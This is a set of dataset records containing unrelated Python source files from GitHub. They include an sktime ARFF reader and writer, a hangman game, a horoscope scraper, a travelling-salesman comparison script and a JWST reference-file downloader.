cls(\n\t\t\towner=owner,\n\t\t\trepoName=repoName,\n\t\t\tsecretName=args.secret,\n\t\t)\n","repo_name":"zhenghaven/GitHubApiHelper","sub_path":"GitHubApiHelper/APIs/ApiActionsSecrets.py","file_name":"ApiActionsSecrets.py","file_ext":"py","file_size_in_byte":3932,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"12743956902","text":"def eval(net,n_points,device='cpu'):\n\n net.eval().to(device)\n dataloader=Transliteration_DataLoader(transliteration_file)\n trans_batch=dataloader.get_batch(n_points)\n eng_words , hin_words= [i[0] for i in trans_batch] , [i[1] for i in trans_batch]\n eng_len , hin_len=[len(i) for i in eng_words],[len(i) for i in hin_words]\n\n\n eng_rep=word_rep(eng_words,max(eng_len),eng_alphabets).to(device)\n hin_rep=word_rep(hin_words,max(hin_len),hin_alphabets)\n\n batch_truth=[]\n for i in hin_words:\n word_truth=[hin_alphabets.index(char) for char in i]\n for j in range((max(hin_len)+1)-len(word_truth)):\n word_truth.append(hin_alphabets.index(''))\n batch_truth.append(word_truth)\n batch_truth=torch.tensor(batch_truth).to(device)\n correct=0\n total_letters=0\n for i in range(len(eng_rep)):\n # print(eng_words[i],hin_words[i])\n batched_output=net.forward(eng_rep[i].unsqueeze(0),batch_size=1,ground_truth=hin_rep[i].unsqueeze(0),max_len=hin_len[i]+1,device=device)\n output=batched_output.view(batched_output.size()[1],-1).permute(1,0)\n\n\n for index,letter in enumerate(output):\n total_letters+=1\n # print(\"Predicted\",hin_alphabets[torch.argmax(letter)])\n # print(\"Truth\",hin_alphabets[batch_truth[i][index]])\n if torch.argmax(letter)==batch_truth[i][index]:\n correct+=1\n return correct/total_letters\n\n\ndef predict(net,word,device='cpu'):\n\n net.eval().to(device)\n eng_rep=word_rep([word],len(word),eng_alphabets).to(device)\n batched_output=net.forward(eng_rep[0].unsqueeze(0),batch_size=1,ground_truth=None,max_len=10,device=device)\n output=batched_output.view(batched_output.size()[1],-1).permute(1,0)\n hin_word=\"\"\n \n for i in range(len(eng_rep)):\n batched_output=net.forward(eng_rep[i].unsqueeze(0),batch_size=1,ground_truth=None,max_len=10,device=device)\n output=batched_output.view(batched_output.size()[1],-1).permute(1,0)\n\n for index,letter in enumerate(output):\n if hin_alphabets[torch.argmax(letter)]=='':\n break\n hin_word+=hin_alphabets[torch.argmax(letter)]\n\n return hin_word\n","repo_name":"TanD18/Transliteration-enc-dec-attention-model-","sub_path":"code/evaluate-predict.py","file_name":"evaluate-predict.py","file_ext":"py","file_size_in_byte":2080,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"30826015940","text":"import websocket\nimport json\n\ndef on_message(ws, message):\n print(f\"Received message: {message}\")\n\ndef on_error(ws, error):\n print(f\"Error: {error}\")\n\ndef on_close(ws, close_status_code, close_msg):\n print(f\"Closed with status code {close_status_code}: {close_msg}\")\n\ndef on_open(ws):\n # Define a message to be sent to the server\n message_data = {\n \"type\": \"websocket.receive\",\n \"text\": \"Hello from Python WebSocket Client\"\n }\n\n # Send the message as JSON\n ws.send(json.dumps(message_data))\n\nif __name__ == \"__main__\":\n # Replace the URL with your WebSocket server URL\n websocket_url = \"ws://127.0.0.1:8000/ws\"\n\n # Create a WebSocket instance\n ws = websocket.WebSocketApp(websocket_url,\n on_message=on_message,\n on_error=on_error,\n on_close=on_close)\n\n # Set the on_open callback to send a message when the connection is established\n ws.on_open = on_open\n \n # Run the WebSocket connection\n ws.run_forever()\n","repo_name":"Minervaa45/lab","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1065,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"33997197670","text":"\"\"\"Util function for writing to and reading arff files.\"\"\"\n\n__author__ = [\"SebasKoel\", \"Emiliathewolf\", \"TonyBagnall\", \"jasonlines\", \"achieveordie\"]\n__all__ = [\"load_from_arff_to_dataframe\"]\n\nimport itertools\nimport os\nimport textwrap\n\nimport numpy as np\nimport pandas as pd\n\nfrom sktime.transformations.base import BaseTransformer\n\n# ==================================================================================================\n# Utils function to read arff file\n# ==================================================================================================\n\n\n# TODO: original author didnt add test for this function\n# Refactor the nested loops\ndef load_from_arff_to_dataframe(\n full_file_path_and_name,\n has_class_labels=True,\n return_separate_X_and_y=True,\n replace_missing_vals_with=\"NaN\",\n):\n \"\"\"Load data from a .arff file into a Pandas DataFrame.\n\n Parameters\n ----------\n full_file_path_and_name: str\n The full pathname of the .arff file to read.\n has_class_labels: bool\n true then line contains separated strings and class value contains\n list of separated strings, check for 'return_separate_X_and_y'\n false otherwise.\n return_separate_X_and_y: bool\n true then X and Y values should be returned as separate Data Frames (\n X) and a numpy array (y), false otherwise.\n This is only relevant for data.\n replace_missing_vals_with: str\n The value that missing values in the text file should be replaced\n with prior to parsing.\n\n Returns\n -------\n DataFrame, ndarray\n If return_separate_X_and_y then a tuple containing a DataFrame and a\n numpy array containing the relevant time-series and corresponding\n class values.\n DataFrame\n If not return_separate_X_and_y then a single DataFrame containing\n all time-series and (if relevant) a column \"class_vals\" the\n associated class values.\n \"\"\"\n instance_list = []\n class_val_list = []\n data_started = False\n is_multi_variate = False\n is_first_case = True\n # Parse the file\n # print(full_file_path_and_name)\n with open(full_file_path_and_name, encoding=\"utf-8\") as f:\n for line in f:\n if line.strip():\n if (\n is_multi_variate is False\n and \"@attribute\" in line.lower()\n and \"relational\" in line.lower()\n ):\n is_multi_variate = True\n\n if \"@data\" in line.lower():\n data_started = True\n continue\n # if the 'data tag has been found, the header information\n # has been cleared and now data can be loaded\n if data_started:\n line = line.replace(\"?\", replace_missing_vals_with)\n\n if is_multi_variate:\n if has_class_labels:\n line, class_val = line.split(\"',\")\n class_val_list.append(class_val.strip())\n dimensions = line.split(\"\\\\n\")\n dimensions[0] = dimensions[0].replace(\"'\", \"\")\n\n if is_first_case:\n for _d in range(len(dimensions)):\n instance_list.append([])\n is_first_case = False\n\n for dim in range(len(dimensions)):\n instance_list[dim].append(\n pd.Series(\n [float(i) for i in dimensions[dim].split(\",\")]\n )\n )\n\n else:\n if is_first_case:\n instance_list.append([])\n is_first_case = False\n\n line_parts = line.split(\",\")\n if has_class_labels:\n instance_list[0].append(\n pd.Series(\n [\n float(i)\n for i in line_parts[: len(line_parts) - 1]\n ]\n )\n )\n class_val_list.append(line_parts[-1].strip())\n else:\n instance_list[0].append(\n pd.Series(\n [float(i) for i in line_parts[: len(line_parts)]]\n )\n )\n x_data = pd.DataFrame(dtype=np.float32)\n for dim in range(len(instance_list)):\n x_data[\"dim_\" + str(dim)] = instance_list[dim]\n if has_class_labels:\n if return_separate_X_and_y:\n return x_data, np.asarray(class_val_list)\n else:\n x_data[\"class_vals\"] = pd.Series(class_val_list)\n return x_data\n\n\n# ==================================================================================================\n# Utils function to write results from tabular transformation to arff file\n# ==================================================================================================\n\n\n# Research function?\ndef write_tabular_transformation_to_arff(\n data,\n transformation,\n path,\n problem_name=\"sample_data\",\n class_label=None,\n class_value_list=None,\n comment=None,\n fold=\"\",\n fit_transform=True,\n):\n \"\"\"Transform dataset using a tabular transformer and write the result to arff file.\n\n Parameters\n ----------\n data: pandas dataframe or 3d numpy array\n The dataset to build the transformation with which must be of the structure\n specified in the documentation examples/loading_data.ipynb.\n transformation: BaseTransformer\n Transformation use and to save to arff.\n path: str\n The full path to output the arff file to.\n problem_name: str, default=\"sample_data\"\n The problemName to print in the header of the arff file and also the name of\n the file.\n class_label: list of str or None, default=None\n The problems class labels to show the possible class values for in the file\n header, optional.\n class_value_list: list, ndarray or None, default=None\n The class values for each case, optional.\n comment: str or None, default=None\n Comment text to be inserted before the header in a block.\n fold: str or None, default=None\n Addon at the end of the filename, i.e. _TRAIN or _TEST.\n fit_transform: bool, default=True\n Whether to fit the transformer prior to calling transform.\n\n Returns\n -------\n None\n \"\"\"\n # ensure transformation provided is a transformer\n if not isinstance(transformation, BaseTransformer):\n raise ValueError(\"Transformation must be a BaseTransformer\")\n if fit_transform:\n data = transformation.fit_transform(data, class_value_list)\n else:\n data = transformation.transform(data, class_value_list)\n if isinstance(data, pd.DataFrame):\n data = data.to_numpy()\n if class_value_list is not None and class_label is None:\n class_label = np.unique(class_value_list)\n elif class_value_list is None:\n class_value_list = []\n # ensure number of cases is same as the class value list\n if len(data) != len(class_value_list) and len(class_value_list) > 0:\n raise IndexError(\n \"The number of cases is not the same as the number of given class values\"\n )\n if fold is None:\n fold = \"\"\n # create path if not exist\n dirt = f\"{str(path)}/{str(problem_name)}-{type(transformation).__name__}/\"\n try:\n os.makedirs(dirt)\n except os.error:\n pass # raises os.error if path already exists\n # create arff file in the path\n file = open(\n f\"{dirt}{str(problem_name)}-{type(transformation).__name__}{fold}.arff\", \"w\"\n )\n # write comment if any as a block at start of file\n if comment is not None:\n file.write(\"\\n% \".join(textwrap.wrap(\"% \" + comment)))\n file.write(\"\\n\")\n # begin writing header information\n file.write(f\"@Relation {problem_name}\\n\")\n # write each attribute\n for i in range(data.shape[1]):\n file.write(f\"@attribute att{str(i)} numeric\\n\")\n # write class attribute if it exists\n if class_label is not None:\n comma_separated_class_label = \",\".join(str(label) for label in class_label)\n file.write(f\"@attribute target {{{comma_separated_class_label}}}\\n\")\n file.write(\"@data\\n\")\n for case, value in itertools.zip_longest(data, class_value_list):\n # turn attributes into comma-separated row\n atts = \",\".join([str(num) if not np.isnan(num) else \"?\" for num in case])\n file.write(str(atts))\n if value is not None:\n file.write(f\",{value}\") # write the case value if any\n elif class_label is not None:\n file.write(\",?\")\n file.write(\"\\n\") # open a new line\n file.close()\n","repo_name":"sktime/sktime","sub_path":"sktime/datasets/_readers_writers/arff.py","file_name":"arff.py","file_ext":"py","file_size_in_byte":9141,"program_lang":"python","lang":"en","doc_type":"code","stars":7028,"dataset":"github-code","pt":"52"} +{"seq_id":"7791648072","text":"from __future__ import unicode_literals\n\nfrom datetime import date, timedelta\nfrom lxml import html\nimport requests\n\nclass BaseSpider(object):\n STAR_SIGNS = list(enumerate([\n 'Aries',\n 'Taurus',\n 'Gemini',\n 'Cancer',\n 'Leo',\n 'Virgo',\n 'Libra',\n 'Scorpio',\n 'Sagittarius',\n 'Capricorn',\n 'Aquarius',\n 'Pisces',\n ]))\n\n @property\n def FIRST_DATE(self):\n raise NotImplementedError\n\n @property\n def LAST_DATE(self):\n raise NotImplementedError\n\n @property\n def QUERY_SELECTOR(self):\n raise NotImplementedError\n\n def __init__(self, star_sign, max_days_to_read=None):\n assert isinstance(star_sign, int)\n assert star_sign >= 0 and star_sign <= 11\n assert isinstance(max_days_to_read, int) or max_days_to_read is None\n\n self._TIMESPAN = (self.LAST_DATE - self.FIRST_DATE).days if max_days_to_read is None else max_days_to_read\n self.star_sign = star_sign\n\n def __str__(self):\n return self.__class__.__name__\n\n def _get_url(self, ref_date):\n raise NotImplementedError\n\n def _find_message_dom(self, dom):\n raise NotImplementedError\n\n def __iter__(self):\n self._days_read = 0\n return self\n\n def __len__(self):\n return self._TIMESPAN\n\n def next(self):\n if self._days_read == self._TIMESPAN:\n raise StopIteration\n\n doi = self.FIRST_DATE + timedelta(days=self._days_read)\n self._days_read += 1\n\n page = requests.get(self.get_url(doi))\n tree = html.fromstring(unicode(page.content, errors='ignore'))\n\n return {\n 'source': str(self),\n 'star_sign_index': self.star_sign,\n 'star_sign_name': self.STAR_SIGNS[self.star_sign][1],\n 'date': doi.strftime('%Y-%m-%d'),\n 'message': self._find_message_dom(tree.xpath(self.QUERY_SELECTOR)),\n }\n\n def __next__(self):\n return self.next()\n","repo_name":"daiaventureira/cosmos.garden","sub_path":"model/crawler/spiders/base_spider.py","file_name":"base_spider.py","file_ext":"py","file_size_in_byte":2009,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"71603581604","text":"#Projeto simples Forca 07/06/2021\n\nimport art\nimport random\n\n#Introdução:\nprint('\\n BEM VINDO AO JOGO DA FORCA - BOA SORTE !! \\n')\n\n#Lista de palavras e escolhendo uma plavra da lista aleatória:\npalavras = ['cobra', 'barata', 'sapato', 'brinco', 'taturana', 'zebra', 'chocolate',\n 'pokemon', 'dado', 'escola', 'trabalho', 'rua', 'asfalto', 'triste', 'alegre',\n 'bravo', 'azul', 'amor', 'vermelhor', 'amarelo', 'violeta', 'zangado', 'vaca', 'tatu',\n 'computador', 'escrivaninha', 'saco', 'motocicleta', 'chuteira', 'futebol', 'basket',\n 'paralelepipedo', 'ansioso', 'tremendo', 'orgulho']\npalavra_escolhida = random.choice(palavras)\n\n#Testando o código:\nprint(f'A plavra chave é: {palavra_escolhida}')\n\n#Criando blanks:\nblanks = []\nfor letras in palavra_escolhida:\n blanks += '_'\n\n#Iniciando o jogo:\nfim_de_jogo = False\nvidas = 6\n\nwhile not fim_de_jogo:\n user_input = input('Escolha uma letra: ').lower()\n\n #Lógica de escolha de letras\n if user_input in blanks:\n print('\\nVocê já escolheu essa letra, escolha uma outra !\\n')\n else:\n #Verificação da letra escolhida com a plavra escolhida.\n for posicao in range(len(palavra_escolhida)):\n if palavra_escolhida[posicao] == user_input:\n blanks[posicao] = user_input\n\n #Checando se usuário está escolheu errado:\n if user_input not in palavra_escolhida:\n vidas -= 1\n print('A palavra não possui essa letra\\n')\n if vidas == 0:\n fim_de_jogo = True\n print('\\nQUE PENA, você perdeu, tente outra vez !')\n\n #Juntando as letras para se tornar uma string.\n print(f\"{' '.join(blanks)}\")\n\n #Checando para ver se ainda existe \"_\" em blanks.\n if \"_\" not in blanks:\n fim_de_jogo = True\n print('\\nPARABÉNS, você acertou todas as letras !!')\n\n #Mostrando a arte:\n print(art.stages[vidas])","repo_name":"calebeandrade93/100_Days_Python_Projects","sub_path":"Hangman/hangman.py","file_name":"hangman.py","file_ext":"py","file_size_in_byte":1991,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"11356425314","text":"import math\nimport random\nimport matplotlib.pyplot as plt\n\ndef randIntegers(N):\n numbers = list(range(N))\n random.shuffle(numbers)\n return numbers\n\ndef almostSortedIntegers(N):\n numbers = list(range(N))\n displacement = 2\n for i in range(N // 3):\n random_index = random.randint(displacement, N-1)\n temp = numbers[random_index]\n numbers[random_index] = numbers[random_index - displacement]\n numbers[random_index - displacement] = temp\n return numbers\n\ndef reversedAlmostSoretdIntegers(N):\n numbers = almostSortedIntegers(N)\n return list(reversed(numbers))\n\ndef randomGauss(N):\n numbers = []\n for i in range(N):\n numbers.append(random.gauss(13, 2))\n return numbers\n\ndef repeatedIntegers(N):\n numbers = []\n for i in range(N):\n numbers.append(random.randint(0, math.floor(math.sqrt(N))))\n return numbers\n\n\n# N = 100\n\n# with open(\"RandomIntegers.txt\", \"w\") as output:\n# print(randIntegers(N), file = output)\n\n# with open(\"AlmostSortedIntegers.txt\", \"w\") as output:\n# print(almostSortedIntegers(N), file = output)\n# # print(list(range(N)), file = output)\n\n# with open(\"ReversedAlmostSortedIntegers.txt\", \"w\") as output:\n# print(reversedAlmostSoretdIntegers(N), file = output)\n# # print(list(range(N)), file = output)\n\n# with open(\"Gauss.txt\", \"w\") as output:\n# print(randomGauss(N), file = output)\n\n# with open(\"RepeatedIntegers.txt\", \"w\") as output:\n# print(repeatedIntegers(N), file = output)\n","repo_name":"BloodyShrimp/Python_2021-22","sub_path":"Zestaw11/generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":1503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"17465950704","text":"def quick_sort(arr,low,high):\r\n if low < high:\r\n partition_pos = partition(arr,low,high)\r\n quick_sort(arr,low,partition_pos-1)\r\n quick_sort(arr,partition_pos+1,high)\r\n\r\ndef partition(arr,low,high):\r\n i = low\r\n j = high - 1\r\n pivot = arr[high] # last element of the array\r\n\r\n while i < j:\r\n while i < high and arr[i] < pivot:\r\n i += 1\r\n while j > low and arr[j] >= pivot:\r\n j -= 1\r\n if i < j:\r\n arr[i],arr[j] = arr[j],arr[i]\r\n if arr[i] > pivot:\r\n arr[i],arr[high] = arr[high],arr[i]\r\n \r\n return i\r\n\r\narr = [8,5,3,4,26,6,9,52]\r\nquick_sort(arr,0,len(arr)-1)\r\nprint(arr)\r\n\r\nprint(\"Hello World\")","repo_name":"iamrahul-9/45-DAYS-DSA","sub_path":"Day16.py","file_name":"Day16.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"33367611327","text":"from gensim.models.doc2vec import Doc2Vec as D2V, TaggedDocument\nimport joblib\nimport gc\n\nclass Doc2Vec():\n def __init__(self, input_df):\n self.data = input_df.drop_duplicates(subset = \"text_index\")\n \n def tag_docs(self, stop_words = False):\n if stop_words:\n self.documents_col = \"text_preprocessed\"\n else:\n self.documents_col = \"text_no_stop\"\n self.tagged_docs = [TaggedDocument(words=doc.split(), tags=[i]) for i, doc in enumerate(self.data[self.documents_col])]\n\n def document_encode(self, dimensions = 100, iterations = 1500):\n self.dimensions = dimensions\n \n model = D2V(vector_size = int(dimensions), window = 4, epochs = iterations, dm = 0) ## DM = 0 for DBOW\n model.build_vocab(self.tagged_docs)\n model.train(self.tagged_docs, total_examples=model.corpus_count, epochs=model.epochs)\n self.document_embeddings = [model.infer_vector(doc.split()) for doc in self.data[self.documents_col]]\n del model\n gc.collect()\n \n def save_docs(self, directory, stop_words, name = None):\n stops = \"\"\n if not stop_words:\n stops = \"_b\"\n if not name:\n name = f\"Doc2Vec - {self.dimensions} dimensions{stops}.joblib\"\n if not name.endswith(\".joblib\"):\n name = f\"{name}.joblib\"\n\n with open(f'{directory}/{name}', 'wb') as file:\n joblib.dump(self.document_embeddings, file)\n file.close()","repo_name":"tomlanstone/Dissertation---Main-Code-Only","sub_path":"Code and data/Code/Classes/Doc2Vec.py","file_name":"Doc2Vec.py","file_ext":"py","file_size_in_byte":1485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"5202759790","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\ndef modelo(x, lam):\n return np.exp(-x/lam)/lam\n\ndef p_lam(lam):\n if lam>=1 and lam<=99:\n return 1/99.0\n else:\n return 0\n\ndef p_x_l(obs, lam):\n mul = 1.0\n norm = -np.exp(-20/float(lam))+np.exp(-1/float(lam))\n for dato in obs:\n mul *= modelo(dato,lam)/norm\n return mul\n\nx = [1.2, 2.5, 2.8, 5.0]\n\np_lam_x = []\nfor i in range(1,100):\n p_lam_x.append(p_x_l(x, i)*p_lam(i))\n\nplt.figure()\nplt.plot(range(1,100),np.asarray(p_lam_x))\nplt.savefig(\"figurita.pdf\")\n\n\n \n","repo_name":"RafaD0507/RafaelSanabria_Ejercicio24","sub_path":"westside.py","file_name":"westside.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"39933694197","text":"#pip install python_tsp\r\nfrom python_tsp.exact import solve_tsp_dynamic_programming\r\nimport os\r\nos.chdir(\"C:\\\\Users\\\\Endrit\\\\Desktop\\\\Master Finance\\\\2nd Semster\\\\Programming\\\\ProjectVF\\\\\")\r\nprint(\"Current working directory: {0}\".format(os.getcwd()))\r\nfrom ClassCities import Cities\r\nfrom ClassNNV import NNV\r\nfrom ClassAnt import Ant\r\nimport numpy as np\r\n\r\n\r\n\r\n\r\n\r\nnnvprec = []\r\nantprec = [] \r\nantnprec = [] \r\nbfprec = []\r\nfor n in range(5,8) :\r\n stat = 0\r\n print(\"this is :\",n)\r\n for i in range(1,100) :\r\n nnv = NNV(n,i)\r\n nnv.swapR()\r\n ant = Ant(n,i)\r\n ant.desir()\r\n ant.Sim() # 30% of the number of cities of ants are generate by default\r\n a = Cities(n,i)\r\n distance_matrix = a.mat\r\n permutation, distance = solve_tsp_dynamic_programming(distance_matrix)\r\n bfprec.append(distance)\r\n nnvprec.append(nnv.mindis)\r\n antprec.append(ant.bestTests)\r\n antt = Ant(n,i)\r\n antt.desir()\r\n antt.Sim(maxfrac=1) #here we generate as many ants as the number of cities\r\n antnprec.append(antt.bestTests)\r\n \r\nnnvpreC = np.round(np.array(nnvprec),12) # here we round to 12 decimals\r\nantpreC = np.round(np.array(antprec),12)\r\nantnpreC = np.round(np.array(antnprec),12)\r\nbfpreC = np.round(np.array(bfprec),12)\r\nnnvpreC = (nnvpreC-bfpreC)/bfpreC\r\nantpreC = (antpreC-bfpreC)/bfpreC\r\nantnpreC = (antnpreC-bfpreC)/bfpreC\r\n\r\nmeanNNV = np.mean(nnvpreC)\r\nmeanANT = np.mean(antpreC)\r\nmeanNANT = np.mean(antnpreC)\r\n\r\nprint(\"this is the average precisions of the NNV algorithm over 100 iterations from 5 to 20 ciites :\",1-meanNNV)\r\nprint(\"this is the average precisions of the Ant algorithm with number of ants = 0.3n over 100 iterations from 5 to 20 ciites :\",1-meanANT)\r\nprint(\"this is the average precisions of the Ant algorithm with number of ants = n over 100 iterations from 5 to 20 ciites :\",1-meanNANT)\r\n\r\n#this is the average precisions of the NNV algorithm over 100 iterations from 5 to 20 ciites : 0.9618642998308147\r\n#this is the average precisions of the Ant algorithm with number of ants = 0.3n over 100 iterations from 5 to 20 ciites : 0.8413103734128827\r\n#this is the average precisions of the Ant algorithm with number of ants = n over 100 iterations from 5 to 20 ciites : 0.9688680799305202\r\n\r\n\r\n\r\n","repo_name":"Endkas/TSP","sub_path":"PrecisionAlgorithms.py","file_name":"PrecisionAlgorithms.py","file_ext":"py","file_size_in_byte":2310,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"32827190416","text":"num = int(input())\nin1 = []\nin3 = []\nshownum = []\ngoto = 0\ncount = 0\nans = 0\nfor i in range(num):\n num1 = input()\n in1.append(num1)\nin2 = input().split(\" \")\nwhile True:\n num3 = int(input())\n if num3 == -1:\n break\n in3.append(num3)\n\nans = in1+in2+in3\nfor i in ans:\n if goto == 0:\n shownum.append(i)\n count+=1\n goto+=1\n else:\n shownum.insert(0, i)\n count=0\n goto-=1\nprint(str(shownum))\n\n\n\n\n","repo_name":"Thanakorn255/Python_Daily","sub_path":"Day012.py","file_name":"Day012.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"7535775358","text":"import matplotlib.pyplot as plt\nimport cmasher as cmr\ncolors = cmr.take_cmap_colors(HMCRamp, None, cmap_range=(0.2, 0.8), return_fmt='hex')\n\n\n\n# Dictionary of HMC hub colors \nhubPalette = {\n \"Information\":\"#A0235A\",\n \"Health\":\"#D23264\",\n \"Matter\":\"#F0781E\",\n \"Energy\":\"#FFD228\",\n \"Aeronautics, Space and Transport\":\"#50C8AA\",\n \"Earth and Environment\":\"#326469\"\n }\n\n# List of HMC color palette\nHMCPalette = [\n \"#A3C6E1\",\n \"#005AA0\",\n \"#0A2D6E\",\n \"#1B3142\",\n \"#5A696E\",\n \"#7B878B\",\n \"#ADB7BA\",\n \"#D6F094\",\n \"#8CB423\",\n \"#3F5704\"\n ]\n\n# List of Hub Info color Palette \nhubInfoPalette = [\n \"#005AA0\",\n \"#0A2D6E\",\n \"#051E30\",\n \"#454747\",\n \"#7B878B\",\n \"#D979A3\",\n \"#A0235A\",\n \"#5E2940\",\n \"#470723\"\n ]\n\n# create color ramps for continuous data out of color palettes\n# function to create ramp: make_ramp()\ndef make_Ramp( ramp_colors ): \n from colour import Color\n from matplotlib.colors import LinearSegmentedColormap\n\n color_ramp = LinearSegmentedColormap.from_list( 'my_list', [ Color( c1 ).rgb for c1 in ramp_colors ] )\n plt.figure( figsize = (15,3))\n plt.imshow( [list(np.arange(0, len( ramp_colors ) , 0.1)) ] , interpolation='nearest', origin='lower', cmap= color_ramp )\n plt.xticks([])\n plt.yticks([])\n return color_ramp\n\n\n# to be used in matplotlib: cmap\n# equivalent of plotnine: scale_color_cmap()\n# continuous color scale based on HMC color palette\nHMCRamp = make_Ramp(HMCPalette)\n#cmr.view_cmap(HMCRamp)\n\n# continuous color scale based on Hub Info color palette\nhubInfoRamp = make_Ramp(hubInfoPalette)\n#cmr.view_cmap(hubInfoRamp)\n\n\n","repo_name":"Materials-Data-Science-and-Informatics/survey_dashboard","sub_path":"survey_dashboard/data/display_specifications/hmc_colordicts.py","file_name":"hmc_colordicts.py","file_ext":"py","file_size_in_byte":1786,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"44684019002","text":"#!/usr/bin/env python\n#\n\"\"\"\nDownload CRDS cache files.\n\nBy Daizhong Liu.\n\n\"\"\"\n\nimport os, sys, re, datetime, glob, shutil\nassert os.environ[\"CRDS_PATH\"] != ''\nassert os.environ[\"CRDS_SERVER_URL\"] != ''\n#os.environ[\"CRDS_PATH\"] = os.path.expanduser('~/jwst_crds_cache')\n#os.environ[\"CRDS_SERVER_URL\"] = \"https://jwst-crds.stsci.edu\"\n\n# Import CRDS\nimport crds\nfrom stpipe import crds_client\n\n# Import JWST pipeline\nfrom jwst import datamodels\nfrom jwst.pipeline import calwebb_detector1\nfrom jwst.pipeline import calwebb_spec2\nfrom jwst.pipeline import calwebb_image2\nfrom jwst.pipeline import calwebb_spec3\n\n# Import click\nimport click\n\n# Setup logging\nimport logging\n\n# Define utility functions\ndef get_script_dir():\n \"\"\"Get current script file's directory path.\"\"\"\n return os.path.abspath(os.path.dirname(__file__))\n\ndef get_script_name():\n \"\"\"Get current script file name without the suffix and replaced some characters to underscores.\"\"\"\n return re.sub(r'[^a-zA-Z0-9_]', r'_', os.path.splitext(os.path.basename(__file__))[0])\n\ndef setup_logger():\n logger_streamhandler = logging.StreamHandler()\n logger_streamhandler_formatter = logging.Formatter(\"[%(asctime)-8s] %(message)s\", \"%H:%M:%S\")\n logger_streamhandler.setFormatter(logger_streamhandler_formatter)\n logger_streamhandler.setLevel(logging.DEBUG)\n\n log_file = get_script_name()\n log_time = datetime.datetime.now().strftime(\"%Y%m%d_%Hh%Mm%Ss\")\n logger_filehandler = logging.FileHandler(f\"log_{log_file}_{log_time}.txt\", mode='a')\n logger_filehandler_formatter = logging.Formatter(\"[%(asctime)-15s] %(message)s\", \"%Y-%m-%d %H:%M:%S\")\n logger_filehandler.setFormatter(logger_filehandler_formatter)\n\n logger = logging.getLogger()\n while len(logger.handlers) > 0:\n del logger.handlers[0]\n logger.addHandler(logger_streamhandler)\n logger.addHandler(logger_filehandler)\n logger.setLevel(logging.DEBUG)\n \n return logger\n\n\n\n# Main \n@click.command()\n@click.argument('jwst_uncal_files', nargs=-1, type=click.Path(exists=True))\ndef main(jwst_uncal_files):\n\n # Add script dir to sys path\n if not (get_script_dir() in sys.path):\n sys.path.append(get_script_dir())\n \n # Setup logger\n logger = setup_logger()\n \n # Check input\n \n # Print CRDS pipeline version\n logger.info('CRDS pipeline version: {}'.format(crds.__version__))\n \n # \n pipeline_context = crds.client.get_default_context('jwst')\n logger.info('pipeline_context: {}'.format(pipeline_context))\n \n #crds.get_cached_mapping(pipeline_context) # need local file to exist\n \n #crds.rmap.load_mapping(pipeline_context)\n \n all_jwst_uncal_files = []\n \n for jwst_uncal_file in jwst_uncal_files:\n if jwst_uncal_file.find('*') >= 0:\n all_jwst_uncal_files.extend(glob.glob(jwst_uncal_file))\n else:\n all_jwst_uncal_files.append(jwst_uncal_file)\n \n all_jwst_uncal_files = list(set(sorted(all_jwst_uncal_files)))\n \n for jwst_uncal_file in all_jwst_uncal_files:\n \n # jwst_data_base_name = os.path.basename(jwst_uncal_file)\n # regex_match = re.match(r'^(jw[0-9]+_[0-9]+_[0-9]+)_([a-z0-9]+)_uncal.fits$', jwst_data_base_name)\n # if regex_match:\n # jwst_data_base_str = regex_match.group(1)\n # jwst_data_detector_str = regex_match.group(2)\n # payload = crds.client.get_aui_best_references(pipeline_context, [jwst_data_base_str+'.'+jwst_data_detector_str])\n # fcache = crds.api.FileCacher(pipeline_context, ignore_cache=False, raise_exceptions=False)\n # fcache.get_local_files([pipeline_context])\n \n # for key in payload.keys():\n # status = payload[key][0]\n # if status is not False:\n # bestrefs = payload[key][1]\n # fcache.get_local_files(bestrefs)\n # #for bestref in bestrefs:\n # # crds.client.get_flex_uri(bestref)\n \n # # with datamodels.open(jwst_uncal_file) as model:\n # # params = {\n # # 'INSTRUME': model.meta.instrument.name, \n # # 'DATE': model.meta.date, \n # # 'TIME': model.meta.observation.time,\n # # }\n # # crds.getreferences(\n # # parameters = parameters, \n # # reftypes = ['DARK'], \n # # context = pipeline_context,\n # # ignore_cache = False,\n # # observatory = 'jwst',\n # # )\n \n \n with datamodels.open(jwst_uncal_file) as model:\n exp_type = model.meta.exposure.type\n \n logger.info('Detector1Pipeline._precache_references: {!r}'.format(jwst_uncal_file))\n pipeline_object = calwebb_detector1.Detector1Pipeline()\n pipeline_object._precache_references(jwst_uncal_file)\n \n \n logger.info('Spec2Pipeline._precache_references: {!r}'.format(jwst_uncal_file))\n if exp_type in ['NRS_IMAGE', 'NRS_WATA', 'NRS_MSATA', 'NRS_TACONFIRM', 'NRS_CONFIRM', 'NRS_FOCUS', 'NRS_MIMF']:\n pipeline_object = calwebb_image2.Image2Pipeline()\n pipeline_object._precache_references(jwst_uncal_file)\n \n # No need stage 3\n # see https://jwst-pipeline.readthedocs.io/_/downloads/en/stable/pdf/\n # Table 4\n \n else:\n pipeline_object = calwebb_spec2.Spec2Pipeline()\n pipeline_object._precache_references(jwst_uncal_file)\n # \n 